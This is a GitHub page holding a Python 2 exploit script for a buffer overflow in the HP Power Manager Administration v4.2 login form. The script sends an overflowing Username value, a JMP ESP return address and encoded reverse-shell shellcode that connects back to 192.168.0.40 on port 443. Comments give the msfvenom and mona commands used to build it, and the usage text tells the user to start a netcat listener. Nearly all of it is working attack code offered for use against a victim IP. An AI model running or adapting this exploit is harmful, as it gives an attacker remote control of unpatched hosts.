-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHPM-admin_exploit.py
More file actions
108 lines (89 loc) · 4.46 KB
/
Copy pathHPM-admin_exploit.py
File metadata and controls
108 lines (89 loc) · 4.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/python
import socket
import sys
import re
# HP Power Manager Administration v4.2 - buffer overflow exploit
# author: Alaa H.J <MasterX>
# Tested on Windows 7 SP1 (x86)
PORT = 80
# args, main
if len(sys.argv) != 2:
print "------------------------------"
print "-=- HPM-Admin-v4.2 Exploit -=-"
print "------------------------------"
print "Usage: %s victimIP" % sys.argv[0]
print "\n(You will get Shell on IP: 192.168.0.40, Port: 443)\n\n"
print "Run one of the following listeners on background:"
print "* 'nc -nvlp 443'"
print "* MetaSploitFramework with payload: 'windows/shell_reverse_tcp'\n"
sys.exit(0)
# validate victim-IP address
victimIP = sys.argv[1]
if not re.match("^([0-9]{1,3}\.){3}[0-9]{1,3}$", victimIP):
print "[!] Invalid victim-IP address.\n"
print "Exiting."
sys.exit(0)
# ---------------------------------------------------
# HPM-Admin crashed on 216 bytes (sent evil buffer to the Username (in the administrator's login page)
# (exact match at offset 261)
# bad chars: \x00 \x0a \x0d \x25 \x26 \x2b
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.40 lport=443 -b "\x00\x0a\x0d\x25\x26\x2b" -e x86/shikata_ga_nai -n 16 -f c
# found 381 bytes of space for the Shell
# shellcode size: 367 bytes
shellcode = ("\x4b\x9b\xf8\x98\xf9\x40\x99\x41\x9f\x9b\x9b\x41\x9f\x49\x42"
"\x2f\xdb\xdc\xba\xc2\xef\x2c\xf1\xd9\x74\x24\xf4\x5e\x31\xc9"
"\xb1\x52\x83\xc6\x04\x31\x56\x13\x03\x94\xfc\xce\x04\xe4\xeb"
"\x8d\xe7\x14\xec\xf1\x6e\xf1\xdd\x31\x14\x72\x4d\x82\x5e\xd6"
"\x62\x69\x32\xc2\xf1\x1f\x9b\xe5\xb2\xaa\xfd\xc8\x43\x86\x3e"
"\x4b\xc0\xd5\x12\xab\xf9\x15\x67\xaa\x3e\x4b\x8a\xfe\x97\x07"
"\x39\xee\x9c\x52\x82\x85\xef\x73\x82\x7a\xa7\x72\xa3\x2d\xb3"
"\x2c\x63\xcc\x10\x45\x2a\xd6\x75\x60\xe4\x6d\x4d\x1e\xf7\xa7"
"\x9f\xdf\x54\x86\x2f\x12\xa4\xcf\x88\xcd\xd3\x39\xeb\x70\xe4"
"\xfe\x91\xae\x61\xe4\x32\x24\xd1\xc0\xc3\xe9\x84\x83\xc8\x46"
"\xc2\xcb\xcc\x59\x07\x60\xe8\xd2\xa6\xa6\x78\xa0\x8c\x62\x20"
"\x72\xac\x33\x8c\xd5\xd1\x23\x6f\x89\x77\x28\x82\xde\x05\x73"
"\xcb\x13\x24\x8b\x0b\x3c\x3f\xf8\x39\xe3\xeb\x96\x71\x6c\x32"
"\x61\x75\x47\x82\xfd\x88\x68\xf3\xd4\x4e\x3c\xa3\x4e\x66\x3d"
"\x28\x8e\x87\xe8\xff\xde\x27\x43\x40\x8e\x87\x33\x28\xc4\x07"
"\x6b\x48\xe7\xcd\x04\xe3\x12\x86\xea\x5c\x1c\x7e\x83\x9e\x1c"
"\x7f\xe8\x16\xfa\x15\x1e\x7f\x55\x82\x87\xda\x2d\x33\x47\xf1"
"\x48\x73\xc3\xf6\xad\x3a\x24\x72\xbd\xab\xc4\xc9\x9f\x7a\xda"
"\xe7\xb7\xe1\x49\x6c\x47\x6f\x72\x3b\x10\x38\x44\x32\xf4\xd4"
"\xff\xec\xea\x24\x99\xd7\xae\xf2\x5a\xd9\x2f\x76\xe6\xfd\x3f"
"\x4e\xe7\xb9\x6b\x1e\xbe\x17\xc5\xd8\x68\xd6\xbf\xb2\xc7\xb0"
"\x57\x42\x24\x03\x21\x4b\x61\xf5\xcd\xfa\xdc\x40\xf2\x33\x89"
"\x44\x8b\x29\x29\xaa\x46\xea\x59\xe1\xca\x5b\xf2\xac\x9f\xd9"
"\x9f\x4e\x4a\x1d\xa6\xcc\x7e\xde\x5d\xcc\x0b\xdb\x1a\x4a\xe0"
"\x91\x33\x3f\x06\x05\x33\x6a")
# found only one non-protected non-read_only DLL [with Execute Page]: MSVCP60.DLL
# (the rest of DLLs were either protected or read_only)
# JMP ESP 0x7608bccf (FFE4)
# !mona find -s "\xFF\xE4" -m MSVCP60.DLL
buffers = "A" * 261 + "\xcf\xbc\x08\x76" + shellcode
# used Live HTTP Headers extension (in Firefox) to get the following HTTP Headers:
# (adjusted the Content-Length so it can fit our Shell)
header = (
"POST http://%s/goform/formLogin HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://%s/index.asp\r\n"
"Connection: keep-alive\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: 651\r\n\r\n"
"HtmlOnly=true&Password=A&loginButton=Submit+Login&Login=%s") % (victimIP, victimIP, victimIP, victimIP, buffers)
print 'Sending malicious code to %s ...' % victimIP
try:
# connect and send
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((victimIP, PORT))
s.send(header)
s.close()
print "\n[v] Done."
except KeyboardInterrupt:
print "\n[!] Interrupted."
exit(0)
except socket.error:
print "\n[x] Terminated."